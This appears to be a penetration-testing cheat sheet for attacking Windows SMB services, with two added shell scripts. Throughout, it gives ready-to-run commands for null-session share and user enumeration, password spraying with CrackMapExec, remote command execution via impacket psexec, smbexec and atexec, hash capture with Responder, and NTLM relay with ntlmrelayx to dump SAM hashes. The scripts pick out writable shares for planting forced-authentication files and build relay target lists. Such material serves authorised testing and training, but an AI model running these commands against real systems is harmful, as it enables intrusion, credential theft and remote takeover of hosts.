SMB
Enumeration
sudo nmap IP -sV -sC -p139,445
Anonymous Authentication
smbclient -N -L //IP
-L    List shares
-N    Use a null session (no password)
smbmap -H IP
smbmap -H IP -r SHARENAME
smbmap -H IP --download "notes\note.txt"
smbmap -H IP --upload LOCALFILE "notes\test.txt"
--download and --upload take remote paths in the form SHARE\path; --upload takes the local source file first, then the remote destination.
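Added example, not from the original page: a small triage script for the anonymous share listings above. It pulls the Disk shares out of smbclient -N -L output and the readable/writable shares out of smbmap -H output, so the next step (smbmap -r, --download, --upload) targets only the shares a null session can actually use. Both samples are constructed to mirror the tools' output formats; they are not real captures.

```shell
# Added example (not part of the original page): triage the anonymous share
# listings above. The two samples are constructed to mirror the output format
# of smbclient -N -L and smbmap -H; they are not real captures.

# Share names from smbclient -N -L //IP: keep only rows whose Type is Disk.
# Share names containing spaces are not handled by the whitespace split.
disk_shares() {
  awk '$2 == "Disk" { print $1 }'
}

# "share:permission" for every share row of smbmap -H IP output.
smbmap_perms() {
  sed -nE 's/^[[:space:]]*([^[:space:]]+)[[:space:]]+(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)([[:space:]].*)?$/\1:\2/p'
}

# Shares a null session can read: candidates for smbmap -r / --download.
readable_shares() {
  smbmap_perms | awk -F: '$2 ~ /READ/ { print $1 }'
}

# Shares a null session can write to: candidates for --upload (and for
# planting files that force a victim to authenticate back to Responder).
writable_shares() {
  smbmap_perms | awk -F: '$2 ~ /WRITE/ { print $1 }'
}

# Constructed sample: smbclient -N -L //IP
SMBCLIENT_SAMPLE='        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        home            Disk      Samba share
        notes           Disk      CheckIT
        IPC$            IPC       IPC Service'

# Constructed sample: smbmap -H IP
SMBMAP_SAMPLE='[+] IP: 10.10.110.17:445        Name: 10.10.110.17      Status: Authenticated
        Disk                            Permissions     Comment
        ----                            -----------     -------
        ADMIN$                          NO ACCESS       Remote Admin
        C$                              NO ACCESS       Default share
        IPC$                            READ ONLY       Remote IPC
        notes                           READ, WRITE     CheckIT
        print$                          READ ONLY       Printer Drivers'

echo "Disk shares:";     printf '%s\n' "$SMBCLIENT_SAMPLE" | disk_shares
echo "Readable shares:"; printf '%s\n' "$SMBMAP_SAMPLE" | readable_shares
echo "Writable shares:"; printf '%s\n' "$SMBMAP_SAMPLE" | writable_shares
```

Pipe real output through the functions the same way, e.g. smbmap -H IP | writable_shares. A writable share reachable without credentials is the finding to chase first: it is both a file-drop location and a place to plant files that trigger the forced authentication described further down.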
RPC (Remote Procedure Call)
rpcclient -U'%' IP
> enumdomusers
-U'%' passes an empty username and password, i.e. a null session. enumdomusers is typed at the rpcclient prompt and lists domain users; enumdomgroups, querydominfo and queryuser RID are useful follow-ups.
./enum4linux-ng.py 10.10.11.45 -A -C
Password Attacks
CME Password Spraying
Use --local-auth when targeting a non-domain-joined computer, or when the credentials belong to local accounts: CME then authenticates against the host's local SAM instead of the domain.
crackmapexec smb IP -u userlist.txt -p 'password!' --local-auth
The --continue-on-success flag keeps spraying after a valid password is found; without it CME stops at the first hit, so other valid accounts in the list would be missed.
RCE - Remote Code Execution
PsExec (Sysinternals) lets us execute processes on remote systems, including fully interactive console applications, without installing any client software on the target: it copies a service binary to the target's ADMIN$ share over SMB and starts it through the Service Control Manager. It therefore needs an account with local administrator rights on the target.
Impacket PsExec
impacket-psexec administrator:'password!'@IP
impacket-smbexec administrator:'password!'@IP
impacket-atexec administrator:'password!'@IP
psexec uploads a service binary to ADMIN$ (noisy and frequently flagged by AV); smbexec creates a temporary service that runs each command through cmd.exe and reads the output back from a share, without dropping a binary; atexec runs the command through the Task Scheduler service. All three need local admin on the target and accept an NTLM hash in place of the password with -hashes LMHASH:NTHASH.
CME Command Execution
crackmapexec smb 10.10.110.17 -u Administrator -p 'password' -x 'whoami' --exec-method smbexec
-x    Run a command (cmd.exe)
-X    Run PowerShell commands
CME Enumerating Users Logged In
crackmapexec smb 10.10.110.17 -u Administrator -p 'password' --loggedon-users
Forced Authentication
responder -I <interface name>
Responder answers LLMNR, NBT-NS and mDNS name requests on the chosen interface and captures the NetNTLMv2 responses of hosts that then try to authenticate to it; crack those offline with hashcat -m 5600.
Impacket-ntlmrelayx
Responder and ntlmrelayx both want port 445, so turn Responder's SMB server off in its config before starting the relay:
## /etc/responder/Responder.conf
SMB = Off
Dump SAM database
impacket-ntlmrelayx --no-http-server -smb2support -t IP
With no -c or -e action given, ntlmrelayx's default on a successful SMB relay is to dump the target's SAM hashes. Relaying to SMB only works if the target does not require SMB signing (workstations and member servers by default; domain controllers require it). --no-http-server stops ntlmrelayx from binding port 80, leaving HTTP to Responder.
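Added example, not from the original page: a relay pre-flight. ntlmrelayx only succeeds against SMB targets that do not require signing, so the block builds the target list from nmap's smb2-security-mode output before the relay is started. The nmap output in the block is constructed to mirror that script's format; the hosts in it are illustrative.

```shell
# Added example (not part of the original page): a relay pre-flight. SMB relay
# with ntlmrelayx only succeeds against hosts that do not require SMB signing,
# so build the target list from a signing check before running the relay. The
# nmap output below is constructed to mirror the smb2-security-mode script;
# the hosts in it are illustrative.

# stdin:  output of  nmap -p445 --script smb2-security-mode <targets>
# stdout: one host per line whose signing is disabled or not required
relay_targets() {
  awk '
    /^Nmap scan report for / {
      host = $NF                          # "1.2.3.4", or "(1.2.3.4)" when a name resolved
      sub(/^\(/, "", host); sub(/\)$/, "", host)
    }
    /Message signing enabled but not required/ || /Message signing.*disabled/ { print host }
  '
}

# Constructed sample of nmap --script smb2-security-mode output for three hosts
NMAP_SAMPLE='Nmap scan report for 10.10.110.17
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for dc01.example.local (10.10.110.10)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.110.18
Host is up (0.0009s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing is disabled!'

echo "Relayable hosts:"; printf '%s\n' "$NMAP_SAMPLE" | relay_targets
# Real use (not executed here): write the list to a file and relay to all of
# them instead of a single -t IP:
#   nmap -p445 --script smb2-security-mode -iL hosts.txt | relay_targets > relay.txt
#   impacket-ntlmrelayx --no-http-server -smb2support -tf relay.txt
# crackmapexec smb <targets> --gen-relay-list relay.txt produces the same list.
```

The domain controller in the sample is dropped on purpose: DCs require signing by default, and relaying to a host that enforces it fails after the authentication is consumed, wasting the captured session.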
Latest Vulnerabilities
SMBGhost (CVE-2020-0796): a pre-authentication buffer overflow in the SMBv3.1.1 compression handling of Windows 10 and Windows Server versions 1903 and 1909, patched by Microsoft in March 2020. Microsoft's interim workaround was to disable SMBv3 compression on the server; unpatched hosts that still negotiate SMB 3.1.1 with compression are exposed.